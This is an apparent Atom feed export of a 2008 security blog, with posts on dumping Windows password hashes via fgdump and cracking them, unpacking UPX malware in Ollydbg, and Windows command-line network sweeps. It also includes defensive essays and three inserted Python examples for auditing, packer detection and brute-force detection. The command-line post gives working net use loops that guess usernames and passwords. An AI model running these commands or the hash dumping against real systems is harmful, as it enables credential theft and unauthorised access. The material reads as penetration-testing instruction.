Here is the scenario, we have popped a windows box with an exploit and we have administrator access. Now we want some passwords. The easiest way to do this is to steal the hashes. To get the hashes we will need a tool to extract them. One of these tools is fgdump.&lt;br /&gt;&lt;br /&gt;You can get fgdump &lt;a href="http://swamp.foofus.net/fizzgig/fgdump/downloads.htm"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We can run fgdump on a remote host by running&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center; font-weight: bold;"&gt;fgdump.exe -h 192.168.0.10 -u Admin -p AdminPass&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-weight: normal;"&gt;This will give us a text file with a .pwdump extension. If you open this file in notepad you will see a file showing some usernames and some password hashes following them.&lt;br /&gt;&lt;br /&gt;After this step we need a password cracking tool. My favorites are John The Ripper and Ophcrack. John is a really good multisystem bruteforcing tool, Ophcrack is a great rainbow table tool. In this example we are going to use Ophcrack.&lt;br /&gt;&lt;br /&gt;We open ophcrack and it looks like the following.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_IYfuPD9qO24/SSjD_gQap3I/AAAAAAAAAFI/V-7YwUxOHfI/s1600-h/oph.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 267px;" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SSjD_gQap3I/AAAAAAAAAFI/V-7YwUxOHfI/s320/oph.jpg" alt="" id="BLOGGER_PHOTO_ID_5271678859595130738" border="0" /&gt;&lt;/a&gt;We then hit the load button and choose pwdump file. Then we point to the file created by fgdump. We then hit the crack button. 
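The .pwdump file produced above is also what a defender wants to read during a password audit, before any cracking happens, because it shows which accounts are exposed by their hash type alone. The following is an added example for this post (not fgdump's or Ophcrack's code): it parses the user:RID:LM:NT::: layout and reports accounts that still store an LM hash, accounts with an empty password, and accounts that share one NT hash. The sample dump is constructed; only the two "empty" hash constants are real values.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample in the pwdump layout (user:RID:LM:NT:::). The per-user
# hashes are made up; only the two constants above are genuine.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
legacyuser:1001:0123456789abcdef0123456789abcdef:22222222222222222222222222222222:::
kiosk:1002:NO PASSWORD*********************:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1003:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
"""

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) tuples, skipping lines that don't fit the layout."""
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) > 3:
            yield fields[0], fields[1], fields[2].lower(), fields[3].lower()

def audit_pwdump(text):
    """Report the weak spots a domain password audit should surface: accounts
    that still have an LM hash (rainbow tables break those in minutes), accounts
    with an empty password, and accounts whose NT hash is shared (password reuse)."""
    lm_present, blank, by_nt = [], [], defaultdict(list)
    for user, _rid, lm, nt in parse_pwdump(text):
        # A real LM hash is 32 hex chars that differ from the well-known empty value;
        # tools also write "NO PASSWORD***" in that field, which the regex rejects.
        if HEX32.match(lm) and lm != EMPTY_LM:
            lm_present.append(user)
        if nt == EMPTY_NT:
            blank.append(user)
        by_nt[nt].append(user)
    shared_nt = {h: users for h, users in by_nt.items() if len(users) > 1}
    return {"lm_present": lm_present, "blank": blank, "shared_nt": shared_nt}

if __name__ == "__main__":
    for key, value in audit_pwdump(SAMPLE_PWDUMP).items():
        print(f"{key}: {value}")
```

Any account in the lm_present list is effectively already cracked once the dump leaves the box; the fix is the NoLMHash policy plus a password change, and a shared NT hash across a service account and an admin account is the reuse that lets one cracked password own the domain.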
Ophcrack will spit out the password after a period of time.&lt;br /&gt;&lt;br /&gt;I usually like to run ophcrack and john in tandem because sometimes john will break a password faster than ophcrack.&lt;br /&gt;&lt;br /&gt;So that's it. You can now reuse the user names and passwords you cracked on other systems. If this is domain controller then the pentest is over because you just owned the domain.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/522754168935527456-773712366884213488?l=infosecsamurai.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/773712366884213488/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=773712366884213488' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/773712366884213488'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/773712366884213488'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/11/smashing-hash.html' title='Smashing the Hash'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_IYfuPD9qO24/SSjD_gQap3I/AAAAAAAAAFI/V-7YwUxOHfI/s72-c/oph.jpg' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-4692922561653977099</id><published>2008-10-18T21:55:00.017-04:00</published><updated>2009-03-09T13:46:00.505-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PEiD'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware Analysis'/><category scheme='http://www.blogger.com/atom/ns#' term='Unpacking Executables'/><category scheme='http://www.blogger.com/atom/ns#' term='Ollydbg'/><title type='text'>Unpacking UPX with Ollydbg</title><content type='html'>I recently participated in the malware challenge 2008 at http://malwarechallenge.info &lt;span style="font-weight: bold;"&gt;Spoiler Alert&lt;/span&gt; if you are taking part in this challenge don't read any further. I am giving away some secrets.&lt;br /&gt;&lt;br /&gt;In the following post I will illustrate what steps should be taken to do low level analysis of malware. This is what is done before behavioral analysis.&lt;br /&gt;&lt;br /&gt;The first thing you need to do is to take a look at the strings in the executable. This can be done in several different ways. The easiest way is to use the strings command in Linux or Cygwin and export the strings to a text file by using the &lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;strings malware.exe &gt; strings.txt.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;At this point if you look at the strings and see all of the text in the clear the executable is probably not packed or obfuscated. This isn't the case most of the time. Usually the malware is packed using a packer and possibly a protector to prevent reverse engineering of the malware.&lt;br /&gt;&lt;br /&gt;If you look through the strings and they all seem obfuscated or strange looking then it's probably a packed portable executable file. So how do you really know? 
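The "strings look obfuscated" intuition can be turned into a measurable check before reaching for PEiD. The following is an added example for this post (not PEiD's or UPX's code): it scores a blob of bytes on Shannon entropy, on the fraction of printable bytes, and on the presence of the UPX section names, and combines them into a verdict. The two sample blobs are constructed (one made of typical import strings, one of seeded random bytes behind a UPX0/UPX1 marker); the 7.0 entropy cut-off is an assumption, not a published threshold.

```python
import math
import random
from collections import Counter

UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")
ENTROPY_THRESHOLD = 7.0   # assumed cut-off; compressed or encrypted data sits near 8.0

def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for a constant stream, 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def printable_ratio(data):
    """Fraction of bytes in the printable ASCII range; readable strings push this up."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in range(32, 127)) / len(data)

def packing_indicators(blob):
    """Three cheap signals: high entropy, few printable bytes, UPX section names."""
    ent = shannon_entropy(blob)
    markers = [m.decode() for m in UPX_MARKERS if m in blob]
    packed = ent > ENTROPY_THRESHOLD or bool(markers)
    return {
        "entropy": round(ent, 2),
        "printable_ratio": round(printable_ratio(blob), 2),
        "markers": markers,
        "verdict": "likely packed" if packed else "probably not packed",
    }

# Constructed samples, not real binaries.
UNPACKED_SAMPLE = (b"kernel32.dll\x00GetProcAddress\x00LoadLibraryA\x00"
                   b"CreateFileA\x00WriteFile\x00CloseHandle\x00") * 60
_rng = random.Random(1)
PACKED_SAMPLE = b"UPX0\x00\x00\x00\x00UPX1" + bytes(_rng.getrandbits(8) for _ in range(4096))

if __name__ == "__main__":
    for label, blob in (("unpacked", UNPACKED_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(label, packing_indicators(blob))
```

On a real file, run the entropy score per PE section rather than over the whole file: a packer leaves the headers readable but makes the compressed section look like noise, and a renamed UPX section still shows that entropy even when the marker strings are gone.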
We use a tool called PEiD. PEiD is a tool that can easily tell if an executable is packed. The first step is to get PEiD from http://peid.has.it/ Once we have downloaded PEiD we open it and it looks like this.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_IYfuPD9qO24/SPqaNnmsENI/AAAAAAAAAEw/T2-MjUl5mOA/s1600-h/peid.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://3.bp.blogspot.com/_IYfuPD9qO24/SPqaNnmsENI/AAAAAAAAAEw/T2-MjUl5mOA/s320/peid.jpg" alt="" id="BLOGGER_PHOTO_ID_5258685073668706514" border="0" /&gt;&lt;/a&gt;We then hit the button with three dots in the upper right hand corner. This lets us browse to our executable. In this case our executable is named malware.exe. We point to the executable and then hit open. Once open it will try to detect the packer. In the case of this challenge it will only report correctly if you change the mode to deep or hardcore. It will then show something like the following image.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_IYfuPD9qO24/SPqdVSf6h1I/AAAAAAAAAE4/VNIF80arm_o/s1600-h/peid.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_IYfuPD9qO24/SPqdVSf6h1I/AAAAAAAAAE4/VNIF80arm_o/s320/peid.jpg" alt="" id="BLOGGER_PHOTO_ID_5258688503976986450" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Notice we are now reporting the malware is packed with  UPX. Ok so lets unpack the UPX. If you try the upx packer tool it will report that the executable can't be unpacked. This is pretty typical, it means that the UPX in the executable is obfuscated or it's so old the unpacker doesn't understand it. So what now?&lt;br /&gt;&lt;br /&gt;Enter Ollydbg. Olly is a great tool for analysis of malware. 
Olly can be used for all sorts of reverse engineering fun, but in this case we are going to use Olly for unpacking the malware. Before we start we also need the OllyDump plugin.&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;To unpack the UPX we first open Ollydbg. Then we choose Open and pick the executable file we are trying to analyze.&lt;/li&gt;&lt;li&gt;Once open we scroll down until we find the &lt;span style="font-weight: bold;"&gt;PUSHAD&lt;/span&gt; instruction. This is the beginning of the loading of the program into memory.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Next we scroll down and find the &lt;span style="font-weight: bold;"&gt;POPAD &lt;/span&gt;instruction. Then we set a breakpoint on the &lt;b style=""&gt;POPAD&lt;/b&gt; instruction by right clicking and choosing Breakpoint.&lt;/li&gt;&lt;li&gt;Then we hit F9. It will then break on the &lt;span style="font-weight: bold;"&gt;POPAD&lt;/span&gt; instruction. &lt;/li&gt;&lt;li&gt;Then we hit F7 several times until we see it hit a &lt;span style="font-weight: bold;"&gt;JMP&lt;/span&gt; instruction. If you look at the hex address next to this statement, this is our &lt;span style="font-weight: bold;"&gt;OEP&lt;/span&gt; or original entry point.&lt;/li&gt;&lt;li&gt;Write down the address next to the &lt;span style="font-weight: bold;"&gt;JMP&lt;/span&gt; instruction.&lt;/li&gt;&lt;li&gt;Then open the Plugins menu, &lt;span style="font-weight: bold;"&gt;choose OllyDump&lt;/span&gt;, then change the size to the last 5 digits of the OEP. Make sure you check Rebuild Import, finally hit Dump, then give the executable a name. 
See below.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Try running the executable to make sure it works.&lt;/li&gt;&lt;li&gt;If it runs then you have successfully unpacked the UPX.&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_IYfuPD9qO24/SPqkbSmU2jI/AAAAAAAAAFA/1qkHrHRvzpI/s1600-h/olly.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_IYfuPD9qO24/SPqkbSmU2jI/AAAAAAAAAFA/1qkHrHRvzpI/s320/olly.jpg" alt="" id="BLOGGER_PHOTO_ID_5258696303664486962" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;Alright so there's no more UPX on this executable. Now we can use the strings command again and we should see several more strings. Including the commands to control an IRC bot. Once you have those commands you can find out just how dangerous a botnet can be.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/522754168935527456-4692922561653977099?l=infosecsamurai.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/4692922561653977099/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=4692922561653977099' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/4692922561653977099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/4692922561653977099'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/10/unpacking-upx-with-ollydbg.html' title='Unpacking UPX with Ollydbg'/><author><name>Infosec 
Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_IYfuPD9qO24/SPqaNnmsENI/AAAAAAAAAEw/T2-MjUl5mOA/s72-c/peid.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-3296782042934338318</id><published>2008-10-03T17:55:00.006-04:00</published><updated>2009-01-01T13:40:47.394-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Command Line'/><category scheme='http://www.blogger.com/atom/ns#' term='Attack Tools'/><title type='text'>Windows Command Line Kung Fu</title><content type='html'>So I know this doesn't apply to all security professionals but if you are a pen tester you might find this useful. Here is the situation. You have hacked a windows box and you have a command shell but your Rules of Engagement say you can't install any software on the compromised machine.&lt;br /&gt;&lt;br /&gt;What do you do to try to get an attack going from that box without adding any software. The answer is some command line kung fu. We can use some windows command line tricks to make this machine give us useful information to continue our attacks deeper.&lt;br /&gt;&lt;br /&gt;First we should do an &lt;span style="font-weight: bold;"&gt;ipconfig/all &lt;/span&gt;and get the information from that command. The do an     &lt;span style="font-weight: bold;"&gt;arp -a&lt;/span&gt; and look at the arp table. After that doing a &lt;span style="font-weight: bold;"&gt;route print&lt;/span&gt; is a good idea.&lt;br /&gt;&lt;br /&gt;If you want to go further and use the host to get more information you can do so with only the command line. 
The trick to this is to use some creative for loops.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;for /L&lt;/span&gt; loops are counter loops. They count out a number and stop&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;for /F &lt;/span&gt;loops iterate over a file.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;I want to enumerate other hosts from the compromised box&lt;/span&gt;. We already have the subnet from our earlier ipconfig /all. We then put this command into the command shell with our subnet.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;C:\for /L %i in (1,1,255) do @ping -n 1 10.0.0.%i | find "Reply"&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;What this does is uses a for /L loop which counts by 1 from 1 to 255 and pings each ip 1 time and then pipes this to the find command and finds  anything with a Reply. Beware that the Reply doesn't work well in Vista and you may have to us "bytes=" instead.&lt;br /&gt;&lt;br /&gt;If you want to use this in a batch file and output the results you can use this command.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;for /L %%i in (1,1,255) do @ping -n 1 10.0.0.%%i | find "Reply" &gt;&gt; replies.txt&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;This will enumerate all of the IP's and export it to a file called replies.txt. 
For batch files you must use a double percent and &gt;&gt; for output.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;Ok so now I want all the names of the devices on this subnet.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;for /L %i in (1,1,255) do @nslookup 10.0.0.%i 2&gt;nul | find "Name" &amp;amp;&amp;amp; echo 10.0.0.%i&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;This for loop counts by 1 from 1 to 255 the does an nslookup for each ip. It outputs error of 2 to nul. Then it finds anything with Name and echos the IP of each name. The double &amp;amp;&amp;amp; means only execute if the first on succeds.&lt;br /&gt;&lt;br /&gt;Alright so we know the IP addresses and names and we want to guess a password can we do that. Sure we can!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="font-weight: bold; text-align: center;"&gt;for /f %i in (password.lst) do @echo %i &amp;amp; @net use \\[target_IP_addr] %i /u:[Username] 2&gt;nul &amp;amp;&amp;amp; echo Username: %i &gt;&gt; success.txt&lt;/div&gt;&lt;br /&gt;I won't explain this since it builds on previous examples. How about a username and password guesser? This is an extremely useful tool but you really should figure it out yourself.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j &amp;amp; @net use \\10.254.83.1 %j /u:%i 2&gt;nul &amp;amp;&amp;amp; echo %i:%j &gt;&gt; success.txt &amp;amp;&amp;amp; net use \\[target IP] /del)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: left;"&gt;So how about that we just created some useful tools only using the command line. How cool is that. I can't take credit for this though. 
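From the blue-team side, the nested for /f loops above leave a very recognisable trace: one source address producing a burst of failed authentications across several account names within a minute. The following is an added example for this post (not from the original and not any product's detection rule): it parses a constructed authentication log, slides a time window over each source's failures, and flags the single-user and user-plus-password guessing patterns. The log format, the 60-second window and the 20-failure and 3-user thresholds are all assumptions for the demonstration; tune them to your environment.

```python
import re
from collections import defaultdict
from datetime import datetime

LINE = re.compile(r"^(\S+) src=(\S+) user=(\S+) result=(\S+)$")

# Assumed thresholds: a person mistyping a password does not fail 20 times in a
# minute, and certainly not against three different account names.
WINDOW_SECONDS = 60
MIN_FAILURES = 20
MIN_USERS_FOR_SPRAY = 3

def build_sample_log():
    """Constructed authentication log (not a real product's format): one host
    running the nested user/password loop from the post, one ordinary user."""
    lines = []
    base = datetime(2008, 10, 3, 17, 40, 0)
    users = ["administrator", "backup", "helpdesk"]
    for i in range(24):                       # 3 users x 8 passwords, one try per second
        stamp = base.replace(second=i)
        lines.append(f"{stamp.isoformat()} src=10.0.0.25 user={users[i % 3]} result=FAIL")
    lines.append("2008-10-03T17:41:10 src=10.0.0.7 user=jsmith result=FAIL")
    lines.append("2008-10-03T17:41:15 src=10.0.0.7 user=jsmith result=FAIL")
    lines.append("2008-10-03T17:41:21 src=10.0.0.7 user=jsmith result=OK")
    return "\n".join(lines)

def parse(text):
    """Return (timestamp, src, user, result) tuples; lines that don't match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return events

def detect_guessing(text):
    """One alert per source whose failures inside any WINDOW_SECONDS span reach
    MIN_FAILURES; the alert records the busiest window seen for that source."""
    failures_by_src = defaultdict(list)
    for when, src, user, result in parse(text):
        if result == "FAIL":
            failures_by_src[src].append((when, user))
    alerts = []
    for src, events in failures_by_src.items():
        events.sort()
        best, start = None, 0
        for end in range(len(events)):
            # advance the window start until the span fits inside WINDOW_SECONDS
            while (events[end][0] - events[start][0]).total_seconds() > WINDOW_SECONDS:
                start += 1
            window = events[start:end + 1]
            if len(window) >= MIN_FAILURES and (best is None or len(window) > best["failures"]):
                users = {u for _, u in window}
                kind = "user+password guessing" if len(users) >= MIN_USERS_FOR_SPRAY else "password guessing"
                best = {"src": src, "failures": len(window), "distinct_users": len(users), "kind": kind}
        if best:
            alerts.append(best)
    return alerts

if __name__ == "__main__":
    for alert in detect_guessing(build_sample_log()):
        print(alert)
```

The same logic applies to Windows failed-logon events or SMB server logs once the parser is swapped for the real format; the signal worth alerting on is the combination of rate and account breadth from one source, which is exactly what a loop over user.txt and pass.txt produces.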
These tricks come from Ed Skoudis of SANS fame. I have changed them a bit, but all credit should go to Ed.&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/522754168935527456-3296782042934338318?l=infosecsamurai.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/3296782042934338318/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=3296782042934338318' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/3296782042934338318'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/3296782042934338318'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/10/windows-command-line-kung-fu.html' title='Windows Command Line Kung Fu'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-8589179956251234385</id><published>2008-09-21T07:25:00.006-04:00</published><updated>2009-01-01T13:39:55.296-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Snort'/><category scheme='http://www.blogger.com/atom/ns#' term='IDS'/><category scheme='http://www.blogger.com/atom/ns#' term='Honeypot'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Nepenthes'/><title type='text'>Antivirus is 
Dead. Now What?</title><content type='html'>I keep hearing people in security news saying &lt;a href="http://securitywatch.eweek.com/virus_and_spyware/antivirus_is_dead_dead_dead.html"&gt;"ANTI VIRUS IS DEAD"&lt;/a&gt;. This is somewhat true that signature based anti virus has become too slow to respond to some of today's security threats. The question for most people now is "OK so anti virus is dead what do I do about detecting malware?"&lt;br /&gt;&lt;br /&gt;The answer to this question is &lt;span style="font-weight: bold;"&gt;defense in depth&lt;/span&gt;. I am going to explain some devices that can help you catch zero day worms or attacks that anti virus might not stop.&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt; &lt;span style="font-weight: bold;"&gt;Network Based IDS/IPS.&lt;/span&gt; This technology helps in the fight against hackers, and malware, It also does a good job with policy enforcement and getting an overall view of network traffic.&lt;br /&gt;&lt;br /&gt;The best open source IDS is snort and its snort inline variant. These allow you to create a very powerful open source IDS/IPS. If you want to implement this Hakin9 magazine has a good article&lt;a href="http://www.snortattack.it/docs/hakin9_6-2006_str22-33_snort_EN.pdf"&gt; here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;The next solution for defending against malware besides anti virus is a &lt;span style="font-weight: bold;"&gt;HONEYPOT.&lt;/span&gt; Low interaction honeypots do a good job of catching malware, spam and other attacks. These types of honeypots are easy to deploy and can give you an edge on worms that try to exploit system vulnerabilities.&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;My favorite low interaction honeypot is &lt;a href="http://nepenthes.mwcollect.org/"&gt;&lt;span style="font-weight: bold;"&gt;Nepenthes&lt;/span&gt;&lt;/a&gt;. This honeypot is ridiculously easy to deploy on any modern Debian based Linux system. 
It will also automatically submit any binaries that it catches to the &lt;a href="http://www.cwsandbox.org/?page=home"&gt;CWsandbox&lt;/a&gt; and &lt;a href="http://www.norman.com/microsites/nsic/en-us"&gt;Norman Sandbox&lt;/a&gt;. This can give you a jump on incident response by giving you automated malware analysis.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Number three on this list is much harder. This involves having someone in your organization who knows how to do &lt;span style="font-weight: bold;"&gt;MALWARE ANALYSIS&lt;/span&gt;. This isn't an easy task and is somewhat of an art. It is important to know how to use tools like VMWARE, IDA PRO, SYSINTERNALS TOOLS, REGSHOT, OLLY DBG, and more.&lt;br /&gt;&lt;br /&gt;SANS institute teaches 5 day courses on malware analysis in their GREM certification program. I will do a malware analysis post here in the near future.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt; &lt;span style="font-weight: bold;"&gt;The fourth and final step is Controlling Access to your network. &lt;/span&gt;Don't let just anyone connect to your network. think of your network like a Medical Operating room. Make sure that all of your devices are malware free and fully patched. Setup internet access policies that allow you to remove internet access from sensitive devices. Air Gap or VLAN any publicly available networks and treat them like DMZ's. Don't let people use USB thumb drives without knowing they are clean before using them in your internal network. If you treat malware like a human virus infection you will have less chance of being infected.&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;In conclusion if anti virus is dead "which it really isn't" then we have several other lines of defense to prevent malware from spreading wildly through our networks. 
Using good defense techniques will keep your data safe even if anti virus fails.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/522754168935527456-8589179956251234385?l=infosecsamurai.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infosecsamurai.blogspot.com/feeds/8589179956251234385/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=522754168935527456&amp;postID=8589179956251234385' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/8589179956251234385'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/522754168935527456/posts/default/8589179956251234385'/><link rel='alternate' type='text/html' href='http://infosecsamurai.blogspot.com/2008/09/antivirus-is-dead-now-what.html' title='Antivirus is Dead. 
Now What?'/><author><name>Infosec Samurai</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_IYfuPD9qO24/SV0aRW1WgqI/AAAAAAAAAGg/fxf-015j9qo/S220/Dark_Dragon.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-522754168935527456.post-3131299971853826861</id><published>2008-09-05T16:57:00.008-04:00</published><updated>2009-01-01T13:39:31.935-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CIA'/><category scheme='http://www.blogger.com/atom/ns#' term='Redundancy'/><category scheme='http://www.blogger.com/atom/ns#' term='floating static routes'/><category scheme='http://www.blogger.com/atom/ns#' term='HSRP'/><category scheme='http://www.blogger.com/atom/ns#' term='Cisco'/><category scheme='http://www.blogger.com/atom/ns#' term='Failover'/><title type='text'>The CIA Security Triad, Availability</title><content type='html'>With the recent vulnerabilities released against Cisco PIX/ASA, I started thinking about network Availability and the security of the technologies related to it. First off, in the design of a network you need to think about and plan for failures. Most failures are related to power or connectivity, but they also include security issues like DoS attacks.&lt;br /&gt;&lt;br /&gt;In the Cisco world there are several methods to accomplish High Availability.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Failover&lt;/span&gt; is one method. This can be done with Cisco routers or ASA devices. This is where, when one device fails, another one picks up right where it left off. 
